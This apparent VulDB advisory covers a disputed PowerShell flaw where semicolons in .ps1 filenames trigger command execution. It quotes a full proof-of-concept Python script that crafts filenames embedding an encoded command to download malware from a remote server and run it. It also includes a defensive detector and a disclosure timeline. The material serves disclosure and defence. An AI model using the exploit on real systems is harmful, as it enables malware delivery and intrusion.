Published on August 30th, 2019
Microsoft Windows PowerShell privilege escalation [Disputed]
A vulnerability classified as critical was found in Microsoft Windows (Operating System) (the affected version is unknown). This vulnerability affects some unknown functionality of the component PowerShell. The manipulation with an unknown input leads to a privilege escalation vulnerability. The CWE definition for the vulnerability is CWE-269. As an impact it is known to affect confidentiality, integrity, and availability.
The weakness was shared 08/01/2019 by John Page (hyp3rlinx) as unconfirmed security advisory (Website). The advisory is available at hyp3rlinx.altervista.org. The vendor cooperated in the coordination of the public release. Local access is required to approach this attack. A single authentication is needed for exploitation. Technical details are unknown but a public exploit is available. The advisory points out:
PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames. This occurs when “.ps1” files contain semicolons “;” or spaces as part of the filename, causing the execution of a different trojan file; or the running of unexpected commands straight from the filename itself without the need for a second file.
A public exploit has been developed by John Page (hyp3rlinx) in POC and been published immediately after the advisory. It is declared as proof-of-concept. It is possible to download the exploit at hyp3rlinx.altervista.org. The vulnerability was handled as a non-public zero-day exploit for at least 12 days. During that time the estimated underground price was around $5k-$25k. The real existence of this vulnerability is still doubted at the moment. The code used by the exploit is:
```python
from base64 import b64encode
import argparse, sys

# Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
# Create ".ps1" files with Embedded commands to download, save and execute malware
# within a PowerShell Script Filename.
# Expects hostname/ip-addr of web-server housing the exploit.
# By hyp3rlinx
# Apparition Security
# ====================
# (Written in Python 2 syntax: print statements, b64encode returning str.)

def parse_args():
    # 'parser' is the global ArgumentParser created under __main__ below.
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    return parser.parse_args()

def main(args):
    # Build the command that will be embedded in the script's filename,
    # encoded the way PowerShell's -e (-EncodedCommand) expects: base64 of UTF-16LE text.
    PSEmbedFilenameMalwr = ""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr " + args.ipaddress + "/" + args.remote_malware_name + " -O %CD%" + args.local_malware_name + " ;sleep -s 2;start " + args.local_malware_name
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))

def create_file(payload):
    # The filename itself carries the semicolon-separated PowerShell invocation;
    # the script body is harmless.
    f = open("Test;PowerShell -e " + payload + ";2.ps1", "w")
    f.write("Write-Output 'Have a nice day!'")
    f.close()

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    PSCmds = main(parse_args())
    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    create_file(PSCmds)
    print "PowerShell - Unsantized Filename Command Execution File created!"
    print "By hyp3rlinx"
```
The advisory illustrates:
or trojan files it doesn’t need to be another PowerShell script and can be one of the following “.com, .exe, .bat, .cpl, .js, .vbs and .wsf”. Therefore, the vulnerably named file “.Hello;World.ps1” will instead execute “hello.exe”, if that script is invoked using the standard Windows shell “cmd.exe” and “hello.exe” resides in the same directory as the vulnerably named script.
The best possible mitigation is suggested to be disabling the affected component.
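Where disabling PowerShell is not an option, a defender can at least inventory scripts whose filenames carry the pattern the advisory describes. The following is an added example, not part of the advisory or its PoC: it flags .ps1 filenames containing a semicolon or an embedded PowerShell invocation and decodes any -EncodedCommand payload (base64 of UTF-16LE) so an analyst can see what such a name would run. The helper names and sample filenames are constructed for this example.

```python
import base64
import re
from typing import Optional

# Matches a PowerShell encoded-command switch (-e / -ec / -encodedcommand) followed by base64.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(b64: str) -> Optional[str]:
    """PowerShell's -EncodedCommand takes base64 of UTF-16LE text; return the plaintext or None."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_filename(name: str) -> dict:
    """Inspect one script filename only; no file content is read and nothing is executed."""
    result = {"name": name, "suspicious": False, "segments": [name], "embedded_commands": []}
    if ";" in name or "powershell" in name.lower() or ENCODED_FLAG.search(name):
        result["suspicious"] = True
    # A ';' inside the name splits it into shell-separated fragments (the advisory's
    # ".Hello;World.ps1" case); record them so the reviewer sees each fragment.
    result["segments"] = [s for s in name.split(";") if s]
    for seg in result["segments"]:
        m = ENCODED_FLAG.search(seg)
        if m:
            decoded = decode_encoded_command(m.group(1))
            result["embedded_commands"].append(decoded if decoded is not None else "<undecodable>")
    return result

# Constructed sample in the shape the PoC produces, with a benign command encoded
# the same way so the decoder's output can be checked.
SAMPLE_COMMAND = "Write-Host 'constructed sample'"
SAMPLE_NAME = ("Test;PowerShell -e "
               + base64.b64encode(SAMPLE_COMMAND.encode("utf-16le")).decode("ascii")
               + ";2.ps1")

if __name__ == "__main__":
    for n in ["Backup-Logs.ps1", ".Hello;World.ps1", SAMPLE_NAME]:
        r = analyze_filename(n)
        print(f"{n!r}: suspicious={r['suspicious']} segments={r['segments']} "
              f"embedded={r['embedded_commands']}")
```

Running this over a directory listing (e.g. `os.listdir` filtered to `.ps1`) gives a quick triage list; a semicolon in a script name is rare enough in practice that every hit deserves a look.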
VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 4.9
Class: Privilege escalation (CWE-269)
07/20/2019 Vendor informed
07/23/2019 +3 days Vendor acknowledged
08/01/2019 +9 days Advisory disclosed
08/01/2019 +0 days Exploit disclosed
08/30/2019 +29 days VulDB entry created
08/30/2019 +0 days VulDB last update
Vendor: microsoft.com